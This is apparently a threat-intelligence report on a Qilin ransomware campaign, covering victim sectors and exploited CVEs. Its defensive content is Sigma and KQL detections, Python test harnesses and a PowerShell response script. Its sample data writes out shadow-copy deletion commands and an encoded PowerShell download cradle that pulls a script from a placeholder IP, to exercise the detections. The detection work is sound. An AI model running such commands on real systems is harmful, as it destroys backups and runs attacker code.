Date: 2026-05-22 Analyst: Security Arsenal Intelligence Unit Source: Ransomware.live / Dark Web Leak Sites
Threat Actor Profile — QILIN
- Aliases: Agenda; Titan (historical association via rebranding).
- Model: RaaS (Ransomware-as-a-Service). Qilin operates an aggressive affiliate program, recruiting skilled initial access brokers (IABs).
- Ransom Demands: Variable, typically ranging from $500,000 to several million USD, largely dependent on victim revenue and exfiltrated data volume.
- Initial Access Vectors: Historically phishing (macro-laced documents), exploitation of exposed VPN/RDP services, and valid credentials obtained via infostealers. Recent intelligence indicates a shift toward exploiting specific internet-facing applications (see CVEs below).
- Double Extortion: Strictly adheres to double extortion: exfiltrates sensitive data prior to encryption and threatens to leak it on the group's Tor leak site if demands are not met.
- Dwell Time: Short. Recent observations suggest an average of 3–5 days from initial access to encryption, reducing the window for detection.
Current Campaign Analysis
Based on 20 recent victim postings between 2026-05-17 and 2026-05-22, Qilin has ramped up operations significantly.
Sector Targeting
While Qilin remains opportunistic, this dataset skews clearly toward Construction (30%), with Manufacturing (15%) and Technology (10%) the next largest sectors.
- Construction (30%), including ROTO Immobilien (AT), CJ Architects (US), Air Conditioning Florida & Partners (US), RCR Industrial Flooring (AU).
- Technology (10%), including Semgrep (US), a high-value target for source code and intellectual property theft.
- Manufacturing (15%), including Snyder Packaging and Buckeye Paper.
- Business Services & Consumer Services: remain consistent secondary targets.
Geographic Concentration
- Primary: United States (US) – ~50% of victims.
- Secondary: United Kingdom (GB), Austria (AT), Argentina (AR), Australia (AU), Canada (CA).
CVE Correlation & Attack Vector
The surge in victims coincides with active exploitation of entries in the CISA Known Exploited Vulnerabilities (KEV) catalog. Based on the victim profile, Qilin affiliates are assessed as likely leveraging:
- CVE-2024-1708 (ConnectWise ScreenConnect): Path traversal which, chained with the authentication bypass CVE-2024-1709, yields unauthenticated remote code execution. Highly effective for gaining access to managed service providers (MSPs) or IT desks managing the target victims.
- CVE-2026-20131 (Cisco Secure Firewall Management Center): Deserialization vulnerability allowing attackers to bypass perimeter defenses or modify firewall rules to maintain persistence.
- CVE-2025-52691 & CVE-2026-23760 (SmarterTools SmarterMail): Authentication bypass and file upload vulnerabilities providing web shell access.
Posting Frequency
The group is maintaining a high tempo of operations, averaging 3–4 victims per day. The clustering of postings around May 20-22 suggests a coordinated "dump" following a weekend encryption wave.
Detection Engineering
The following detection logic is designed to identify the specific TTPs observed in this campaign.
SIGMA Rules
```yaml
title: Potential ScreenConnect Path Traversal Exploit (CVE-2024-1708)
id: 86a2f91a-1234-5678-9101-abcdef123456
status: experimental
description: Detects potential exploitation of the ConnectWise ScreenConnect path traversal vulnerability via traversal sequences in the request path or query string.
author: Security Arsenal
date: 2026-05-22
references:
  - https://cisa.gov/known-exploited-vulnerabilities-catalog
logsource:
  category: webserver
detection:
  selection_query:
    cs-uri-query|contains:
      - '..\'
      - '%2e%2e%5c'
      - 'AuthorizationHelper.asbx'
  selection_stem:
    cs-uri-stem|contains:
      - '..\'
      - '%2e%2e%5c'
  condition: 1 of selection_*
falsepositives:
  - Vulnerability scanners and rare benign parameters that resemble traversal sequences
level: critical
```
```yaml
title: SmarterMail Suspicious File Upload Activity (CVE-2025-52691)
id: b2c3d4e5-6789-0123-4567-89abcdef0123
status: experimental
description: Detects potential unrestricted file upload exploitation on SmarterMail servers (POST to the upgrade-package handler).
author: Security Arsenal
date: 2026-05-22
references:
  - https://cisa.gov/known-exploited-vulnerabilities-catalog
logsource:
  category: webserver
detection:
  selection:
    cs-uri-stem|contains: '/Masters/Default.aspx'
    cs-method: 'POST'
    cs-uri-query|contains: 'UpgradePackage'
  condition: selection
falsepositives:
  - Legitimate administrative upgrades; correlate the source IP with known admin hosts
level: high
```
```yaml
title: Qilin Ransomware Typical Process Execution Pattern
id: f3e4a5b6-7890-4234-8678-0abcdef12345
status: experimental
description: Detects shadow copy and backup catalog deletion consistent with Qilin pre-encryption activity, whether run through vssadmin/wbadmin directly or through PowerShell WMI calls.
author: Security Arsenal
date: 2026-05-22
logsource:
  category: process_creation
  product: windows
detection:
  selection_vssadmin:
    Image|endswith: '\vssadmin.exe'
    CommandLine|contains|all:
      - 'delete'
      - 'shadows'
  selection_wbadmin:
    Image|endswith: '\wbadmin.exe'
    CommandLine|contains|all:
      - 'delete'
      - 'catalog'
  selection_ps_wmi:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains|all:
      - 'Win32_ShadowCopy'
      - 'Delete'
  condition: 1 of selection_*
falsepositives:
  - Legitimate backup maintenance by administrators (rare)
level: critical
```
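To see how the selection logic in these rules behaves on real-looking data, here is an added Python example (not part of the original report, and not Sigma tooling) that implements the small subset of Sigma matching semantics the rules rely on and runs the three selections over constructed IIS W3C log lines and process-creation events. The requests, hostnames and IPs are invented (documentation ranges), and the condition grammar supports only what these rules use.

```python
"""Mini Sigma-style evaluator run over constructed sample events.

Sigma semantics implemented here: keys inside one selection are ANDed, a list
of values under a key is ORed, '|contains' is a case-insensitive substring test,
'|contains|all' requires every value, '|endswith' is a suffix test. Conditions
support a selection name, 'all of prefix*', '1 of prefix*' and 'or' between those.
All events below are constructed samples, not real victim telemetry.
"""
import fnmatch
import re

# Constructed IIS W3C extended log excerpt (ScreenConnect- and SmarterMail-style requests).
W3C_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2026-05-20 03:14:07 198.51.100.23 GET /Login.aspx - 200
2026-05-20 03:14:09 198.51.100.23 GET /Login.aspx dir=..\\..\\App_Extensions 200
2026-05-20 03:15:31 203.0.113.9 POST /Masters/Default.aspx UpgradePackage=1 200
2026-05-20 08:00:02 192.0.2.44 POST /Masters/Default.aspx save=1 200
"""

# Constructed EDR-style process creation events; the last one is benign cleanup and must not fire.
PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Remove-Item C:\Temp\build -Recurse -Force"},
]

# The three selections from the rules above, keyed by a short rule name.
RULES = [
    {"name": "screenconnect_traversal",
     "selections": {"selection": {
         "cs-uri-query|contains": ["..\\", "%2e%2e%5c", "AuthorizationHelper.asbx"]}},
     "condition": "selection"},
    {"name": "smartermail_upload",
     "selections": {"selection": {
         "cs-uri-stem|contains": "/Masters/Default.aspx",
         "cs-method": "POST",
         "cs-uri-query|contains": "UpgradePackage"}},
     "condition": "selection"},
    {"name": "qilin_shadow_deletion",
     "selections": {
         "selection_vssadmin": {"Image|endswith": "\\vssadmin.exe",
                                "CommandLine|contains|all": ["delete", "shadows"]},
         "selection_wbadmin": {"Image|endswith": "\\wbadmin.exe",
                               "CommandLine|contains|all": ["delete", "catalog"]},
         "selection_ps_wmi": {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
                              "CommandLine|contains|all": ["Win32_ShadowCopy", "Delete"]}},
     "condition": "1 of selection_*"},
]


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields names ('-' means empty)."""
    fields, events = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            events.append({f: ("" if v == "-" else v) for f, v in zip(fields, line.split())})
    return events


def field_matches(event, key, wanted):
    """One 'field|modifier: value(s)' entry; a missing field never matches."""
    name, _, modifier = key.partition("|")
    actual = str(event.get(name, "")).lower()
    values = [v.lower() for v in (wanted if isinstance(wanted, list) else [wanted])]
    if modifier == "contains":
        return any(v in actual for v in values)
    if modifier == "contains|all":
        return all(v in actual for v in values)
    if modifier == "endswith":
        return any(actual.endswith(v) for v in values)
    if modifier == "":
        return any(actual == v for v in values)
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(event, selection):
    return all(field_matches(event, k, v) for k, v in selection.items())


def condition_matches(event, rule):
    sels = rule["selections"]

    def term(expr):
        m = re.fullmatch(r"(all|1) of (\S+)", expr.strip())
        if m:
            hits = [selection_matches(event, s) for n, s in sels.items()
                    if fnmatch.fnmatchcase(n, m.group(2))]
            return bool(hits) and (all(hits) if m.group(1) == "all" else any(hits))
        return selection_matches(event, sels[expr.strip()])

    return any(term(t) for t in rule["condition"].split(" or "))


def run_rules(events, rules=RULES):
    """Return one {'rule', 'event'} hit per (event, rule) pair that matches."""
    return [{"rule": r["name"], "event": ev} for ev in events for r in rules if condition_matches(ev, r)]


if __name__ == "__main__":
    for hit in run_rules(parse_w3c(W3C_LOG)) + run_rules(PROCESS_EVENTS):
        print(hit["rule"], "<-", hit["event"])
```

Running it shows the traversal request and the UpgradePackage POST firing, the other two web requests staying quiet (the SmarterMail rule is an AND across stem, method and query), and only the vssadmin and WMI shadow-copy deletions matching the process rule while the Remove-Item cleanup does not.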
KQL (Microsoft Sentinel)
```kql
// Hunt for potential Qilin staging: encoded or download-cradle PowerShell on hosts
// that also opened SMB/RPC connections (lateral movement) in the same window.
// An -EncodedCommand payload hides strings such as IEX from the raw command line,
// so the encoded and plaintext indicators are ORed, not ANDed; decode the blob
// (base64 over UTF-16LE) during triage.
let lookback = 7d;
DeviceProcessEvents
| where Timestamp >= ago(lookback)
| where FileName in~ ("powershell.exe", "pwsh.exe", "powershell_ise.exe", "cmd.exe")
| extend EncodedCommand = extract(@"(?i)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", 1, ProcessCommandLine)
| where isnotempty(EncodedCommand)
    or ProcessCommandLine has_any ("Invoke-Expression", "IEX", "DownloadString", "FromBase64String", "New-Object")
| join kind=inner (
    DeviceNetworkEvents
    | where Timestamp >= ago(lookback)
    | where RemotePort in (445, 135, 139) and ActionType == "ConnectionSuccess"
    | summarize ConnectionCount = count(), FirstSeen = min(Timestamp), LastSeen = max(Timestamp) by DeviceId, RemoteIP
) on DeviceId
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, EncodedCommand, RemoteIP, ConnectionCount, FirstSeen, LastSeen
| order by Timestamp desc
```
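As an added example that is not part of the report, the following Python shows why the encoded-command and plaintext indicators in the hunt have to be ORed: it extracts the base64 blob behind the abbreviated -EncodedCommand switches, decodes it as UTF-16LE (a plain base64 decode yields NUL-interleaved bytes), and only then searches for the cradle strings. The command lines are constructed; the list of switch abbreviations and the indicator list are assumptions documented in the code.

```python
"""Decode PowerShell -EncodedCommand payloads from process command lines, then
apply the plaintext indicators the hunt query looks for.

Sample command lines below are constructed, not observed telemetry.
"""
import base64
import binascii
import re

# Abbreviated switch forms PowerShell accepts for -EncodedCommand (assumption: the
# common ones; extend if your telemetry shows others). Requires whitespace after the
# switch so -ExecutionPolicy is not mistaken for -e.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Indicator strings taken from the hunt query. "IEX" is a substring test, so expect
# some noise (for example iexplore.exe) when this is applied at scale.
INDICATORS = ("Invoke-Expression", "IEX", "DownloadString", "FromBase64String", "New-Object")


def encode_command(script):
    """Produce what an operator passes to -EncodedCommand: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script, or None when no valid encoded payload is present."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped base64 padding
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not base64, or an odd byte count that cannot be UTF-16


def analyze(cmdline):
    """Flag indicators in the visible command line and in the decoded payload."""
    decoded = decode_encoded_command(cmdline)
    haystack = (cmdline + " " + (decoded or "")).lower()
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": sorted(i for i in INDICATORS if i.lower() in haystack),
    }


# Constructed samples: a hidden download cradle, a benign script run (-E is not -enc),
# and an encoded but harmless command.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
SAMPLES = [
    "powershell.exe -NoP -W Hidden -enc " + encode_command(PAYLOAD),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "pwsh.exe -e " + encode_command("Get-Date"),
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(analyze(s))
```

The first sample carries none of the indicator strings in its raw command line, which is exactly the case an AND between "has -EncodedCommand" and "contains IEX" would miss; after decoding it matches three of them.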
PowerShell Response Script
```powershell
<#
.SYNOPSIS
Rapid Response Hardening and Indicators Check for Qilin Campaign
.DESCRIPTION
Checks for recently created scheduled tasks, Volume Shadow Copy deletion, and RDP exposure.
Run from an elevated prompt: vssadmin needs administrator rights.
#>
#Requires -RunAsAdministrator
Write-Host "[+] Starting Qilin Rapid Response Check..." -ForegroundColor Cyan

# 1. Scheduled tasks registered in the last 7 days (Qilin often uses them for persistence).
#    The task Date property is a string and is empty for many built-in tasks, so cast it
#    before comparing; a bare string comparison against a DateTime does not work.
Write-Host "[*] Checking for scheduled tasks created in the last 7 days..." -ForegroundColor Yellow
$cutoff = (Get-Date).AddDays(-7)
Get-ScheduledTask | Where-Object {
    $created = $_.Date -as [datetime]
    $created -and $created -gt $cutoff
} | Select-Object TaskName, TaskPath, Date, Author | Format-Table -AutoSize

# 2. Volume Shadow Copy status (ransomware deletes shadows before encrypting).
Write-Host "[*] Checking Volume Shadow Copy existence..." -ForegroundColor Yellow
try {
    $vss = vssadmin list shadows 2>&1 | Out-String
    if ($vss -match 'No items found that satisfy the query') {
        Write-Host "[!] WARNING: No Volume Shadow Copies found. Possible deletion event." -ForegroundColor Red
    } elseif ($vss -match 'Contents of shadow copy set ID') {
        Write-Host "[+] Shadow Copies present." -ForegroundColor Green
    } else {
        Write-Host "[!] Unexpected vssadmin output; review manually:`n$vss" -ForegroundColor Red
    }
} catch {
    Write-Host "[!] Error checking VSS: $_" -ForegroundColor Red
}

# 3. RDP exposure and live sessions (Qilin often enters through exposed RDP).
Write-Host "[*] Checking RDP state and active sessions..." -ForegroundColor Yellow
$ts = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections
if ($ts.fDenyTSConnections -eq 0) {
    $listening = [bool](Get-NetTCPConnection -State Listen -LocalPort 3389 -ErrorAction SilentlyContinue)
    Write-Host "[!] RDP is enabled (listening on 3389: $listening). Confirm it is not reachable from the internet." -ForegroundColor Red
} else {
    Write-Host "[+] RDP is disabled." -ForegroundColor Green
}
# 'query user' writes "No User exists for *" to stderr when nobody is logged on; that is not an error here.
query user 2>$null
Write-Host "[+] Check Complete." -ForegroundColor Cyan
```
---
Incident Response Priorities
Based on Qilin's known playbook and current campaign indicators:
T-Minus Detection Checklist
- ScreenConnect Logs: Immediately review WebService.asmx and Login.aspx request logs for path traversal attempts (..\ or its URL-encoded form %2e%2e).
- SmarterMail / Exchange Logs: Hunt for authentication anomalies and unauthorized file uploads on webmail interfaces.
- PowerShell Auditing: Scan for encoded commands (-EncodedCommand and abbreviations such as -enc) and Invoke-Expression usage, prioritizing activity originating from non-admin accounts.
Critical Assets at Risk
- Architectural Blueprints & IP: High priority for exfiltration in the Construction sector (CJ Architects, ROTO Immobilien).
- Source Code: Critical for Technology victims (Semgrep).
- Financial & Client PII: Universal target across all sectors.
Containment Actions
- Isolate: Disconnect compromised servers from the network immediately; do not shut down (preserve memory).
- Revoke Credentials: Force reset of passwords for all privileged accounts and any accounts logged into VPN/RDP during the breach window.
- Block IOCs: Block attacker IP addresses and domains associated with the C2 infrastructure as they are identified from EDR, firewall, and VPN telemetry.
Hardening Recommendations
Immediate (24 Hours)
- Patch Critical Vulnerabilities: Apply patches for CVE-2024-1708 and CVE-2024-1709 (ScreenConnect), CVE-2026-20131 (Cisco FMC), and CVE-2025-52691 and CVE-2026-23760 (SmarterMail) immediately.
- Disable Internet-Facing RDP: Ensure RDP is not accessible from the internet. Enforce VPN with MFA for all remote access.
- Audit MFA: Ensure Multi-Factor Authentication is enforced on all external-facing applications (OWA, VPN, ScreenConnect).
Short-Term (2 Weeks)
- Network Segmentation: Segment critical servers (file servers, domain controllers) from user workstations and internet-facing systems.
- EDR Coverage: Ensure EDR agents are deployed and reporting on 100% of endpoints, specifically monitoring for PowerShell abuse.
- Backup Verification: Validate that offline backups are immutable and recent. Test restoration procedures for critical construction/tech data.